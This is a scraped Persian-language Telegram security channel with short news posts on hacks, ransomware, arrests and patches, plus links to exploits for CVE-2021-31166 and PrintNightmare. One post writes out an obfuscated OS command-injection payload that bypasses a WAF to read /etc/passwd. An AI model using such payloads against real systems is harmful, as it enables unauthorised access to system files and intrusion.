امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
آکسپلویت آسیب پذیری پروتکل HTTP که منجر به RCE میشود

شناسه : CVE-2021-31166

https://github.com/0vercl0k/CVE-2021-31166

#http
#rce


@sec_nerd
شرح کامل حمله ی golden ticket به اکتیودایرکتوری

https://sheerazali.com/golden-ticket-attack/


#AD
#windows
#network

@sec_nerd
دور زدن WAF در حمله ی OS command injection

reading /etc/passwd file:
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??

#web
#pentest
#waf

@sec_nerd
👍1
پلیس فدرال امریکا FBI با کمک پلیس استرالیا و برخی شرکای بین المللی دیگر یک پیامرسان ظاهرا رمزنگاری شده را در دنیا و در بین مضنونان خود انتشار داد و توانست کاربران این پیامرسان را شنود کند.
این سرویس Anom نام دارد و سایر کاربران این اپلیکیشن از قابلیت شنود پیامها توسط نهادهای امنیتی بی اطلاع بوده اند.
نقشه ی پراکندگی کاربران Anom در جهان نشان میدهد که این برنامه در ایران هم مورد استفاده قرار میگیرد.

توضیحات بیشتر:

https://www.vice.com/en/article/akgkwj/operation-trojan-shield-anom-fbi-secret-phone-network


#news
#fbi


@sec_nerd
شرکت تولید مواد پروتئینی امریکایی JBS مبلغ ۱۱ میلیون دلار به هکرها برای آزادسازی سیستم های رمزشده در شبکه ی خود پرداخت کرد.

https://thehackernews.com/2021/06/beef-supplier-jbs-paid-hackers-11.html


حملات باج افزاری اخیر به امریکا به شکل بی سابقه ای در حال افزایش است.

#news
#breach

@sec_nerd
هرچه سریعتر اقدام به بروزرسانی مرورگر کروم کنید

وصله ی اخیر کروم چندین آسیب پذیری حیاتی و مهم را که در حال حاضر توسط هکرها مورد استفاده قرار میگیرند رفع کرده است

https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html


#chrome
#google


@sec_nerd
👍1
یکی از اعضای اصلی دستگیر شده ی مرتبط با گروه هکرهای Trickbot یک زن ۵۵ ساله است!
خانم Alla Witte که اصالتا اهل لیتوانی است فارغ التحصیل رشته ی ریاضی و برنامه نویس است که در روسیه زندگی کرده و پس از طی یک دوره برنامه نویسی آماتور، اکنون به یک عضو کلیدی از گروه trickbot تبدیل شده است.
به گفته ی امریکایی ها نام مستعار Max متعلق به witte است و او در تاریخ ۸ فوریه در میامی امریکا دستگیر شده است.

او تاکنون هیچ اعترافی نکرده وکیل وی نیز از اظهار نظر خودداری میکند.

گفتنی ست trickbot نام یک گروه هکری و نیز یک بات نت است که اقدام به انجام حملات سایبری کرده اند.

https://www.msn.com/en-us/money/other/hacker-known-as-max-is-55-year-old-woman-from-russia-us-says/ar-AAKRtxB?ocid=uxbndlbing


😁 امیدتون رو از دست ندید😁


#news
#trickbot


@sec_nerd
کارگر سابق شرکت ADT که تامین کننده ی سیستم های امنیتی برای منازل است به جرم دسترسی غیرمجاز به دوربین های کارگذاشته شده توسط خودش در خانه ها و تماشای بدون اجازه ی ساکنین آن، به ۵۲ ماه زندان محکوم شد.

این فرد که Aviles نام دارد در طی چهار سال و نیم به حدود ۲۰۰ حساب مشتری دسترسی داشته و بصورت زنده به تماشای زنان و روابط جنسی همسران مینشسته است.

او برای آزمایش سیستم های نصب شده ایمیل خود را به حساب میداده تا تست صحت کارکرد آن را بگیرد اما در خانه هایی که زنان آن را جذاب میدید، اقدام به حفظ دسترسی میکرد.

https://www.justice.gov/usao-ndtx/pr/adt-technician-sentenced-hacking-home-security-footage

⛔️ مراقب باشید آدم بیمار همه جا هست ⛔️


#news
#usa
#privacy


@sec_nerd
شرح آسیب پذیری های xss و rce کشف شده در squirrelly

شناسه CVE-2021-32819

https://blog.diefunction.io/vulnerabilities/ghsl-2021-023

#npm
#express
#xss
#rce
#bugbounty


@sec_nerd
اکسپلویت آسیب پذیری RCE در سرویس Spooler ویندوز با شناسه CVE-2021-1675


https://github.com/hhlxf/PrintNightmare


#printnightmare
#windows
#rce


@sec_nerd